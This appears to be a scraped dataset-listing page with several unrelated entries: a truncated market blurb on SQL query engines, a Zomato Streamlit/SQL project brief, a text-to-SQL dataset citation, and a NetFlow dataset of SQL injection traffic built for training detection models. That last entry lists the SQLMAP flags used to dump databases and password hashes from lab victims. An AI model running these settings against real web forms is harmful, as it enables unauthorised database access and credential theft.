The market is also benefiting from the growing emphasis on business intelligence and data-driven decision-making. Enterprises are leveraging SQL query engines to power dashboards, generate real-time reports, and facilitate self-service analytics for non-technical users. Enhanced support for structured query language, improved user interfaces, and integration with visualization tools are making it easier for business users to interact with data, driving broader usage across organizations. Additionally, the rise of data integration and analytics as core business functions is pushing vendors to continuously innovate, offering advanced features such as in-memory processing, machine learning integration, and support for semi-structured data formats.
Regionally, North America continues to dominate the SQL Query Engine market, accounting for the largest revenue share in 2024. This is attributed to the strong presence of technology giants, early adoption of cloud technologies, and a thriving ecosystem of data-driven enterprises. However, Asia Pacific is expected to exhibit the fastest growth during the forecast period, fueled by rapid digitalization, increasing investments in cloud infrastructure, and the emergence of new business models in countries such as China, India, and Japan. Europe, Latin America, and the Middle East & Africa are also witnessing steady growth, supported by regulatory mandates for data governance and the rising importance of analytics in public and private sectors.
The SQL Query Engine market is segmented by component into Software and Services. The software segment commands a substantial share of the market, as enterprises increasingly invest in advanced query engines to enhance their data processing and analytics capabilities. Modern SQL query engine software offers robust features such as distributed query pro
Facebook
Twitterhttps://cdla.io/sharing-1-0/https://cdla.io/sharing-1-0/
Imagine you are working as a data scientist at Zomato. Your goal is to enhance operational efficiency and improve customer satisfaction by analyzing food delivery data. You need to build an interactive Streamlit tool that enables seamless data entry for managing orders, customers, restaurants, and deliveries. The tool should support robust database operations like adding columns or creating new tables dynamically while maintaining compatibility with existing code. ##Business_Use_Cases: Order Management: Identifying peak ordering times and locations. Tracking delayed and canceled deliveries. Customer Analytics: Analyzing customer preferences and order patterns. Identifying top customers based on order frequency and value. Delivery Optimization: Analyzing delivery times and delays to improve logistics. Tracking delivery personnel performance. Restaurant Insights: Evaluating the most popular restaurants and cuisines. Monitoring order values and frequency by restaurant.
#Approach: 1) Dataset Creation: Use Python (Faker) to generate synthetic datasets for customers, orders, restaurants, and deliveries. Populate the SQL database with these datasets. 2) Database Design: Create normalized SQL tables for Customers, Orders, Restaurants, and Deliveries. Ensure compatibility for dynamic schema changes (e.g., adding columns, creating new tables). 3) Data Entry Tool: Develop a Streamlit app for: Adding, updating, and deleting records in the SQL database. Dynamically creating new tables or modifying existing ones. 4) Data Insights: Use SQL queries and Python to extract insights like peak times, delayed deliveries, and customer trends. Visualize the insights in the Streamlit app.(Add on) 5) OOP Implementation: Encapsulate database operations in Python classes. Implement robust and reusable methods for CRUD (Create, Read, Update, Delete) operations. 6) Order Management: Identifying peak ordering times and locations. Tracking delayed and canceled deliveries. 7) Customer Analytics: Analyzing customer preferences and order patterns. Identifying top customers based on order frequency and value.
8) Delivery Optimization: Analyzing delivery times and delays to improve logistics. Tracking delivery personnel performance. 9) Restaurant Insights: Evaluating the most popular restaurants and cuisines. Monitoring order values and frequency by restaurant.
**##Results: ** By the end of this project, learners will achieve: A fully functional SQL database for managing food delivery data. An interactive Streamlit app for data entry and analysis. Should write 20 sql queries and do analysis. Dynamic compatibility with database schema changes. Comprehensive insights into order trends, delivery performance, and customer behavior.
##Project Evaluation metrics: Database Design: Proper normalization of tables and relationships between them. Code Quality: Use of OOP principles to ensure modularity and scalability. Robust error handling for database operations. Streamlit App Functionality: Usability of the interface for data entry and insights. Compatibility with schema changes. Data Insights: Use 20 sql queries for data analysis Documentation: Clear and comprehensive explanation of the code and approach.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Overview
This dataset builds from sql-create-context. @misc{b-mc2_2023_sql-create-context, title = {sql-create-context Dataset}, author = {b-mc2}, year = {2023}, url = {https://huggingface.co/datasets/b-mc2/sql-create-context}, note = {This dataset was created by modifying data from the following sources: \cite{zhongSeq2SQL2017, yu2018spider}.}, }
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.
NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset
Aim
Samples
Benign-malicious
traffic ratio
D1
Training
400,003
50%
D2
Test
57,239
50%
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.
DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).
The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.
Parameters
Description
'--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
Enumerate users, password hashes, privileges, roles, databases, tables and columns
--level=5
Increase the probability of a false positive identification
--risk=3
Increase the probability of extracting data
--random-agent
Select the User-Agent randomly
--batch
Never ask for user input, use the default behavior
--answers="follow=Y"
Predefined answers to yes
Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.
To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.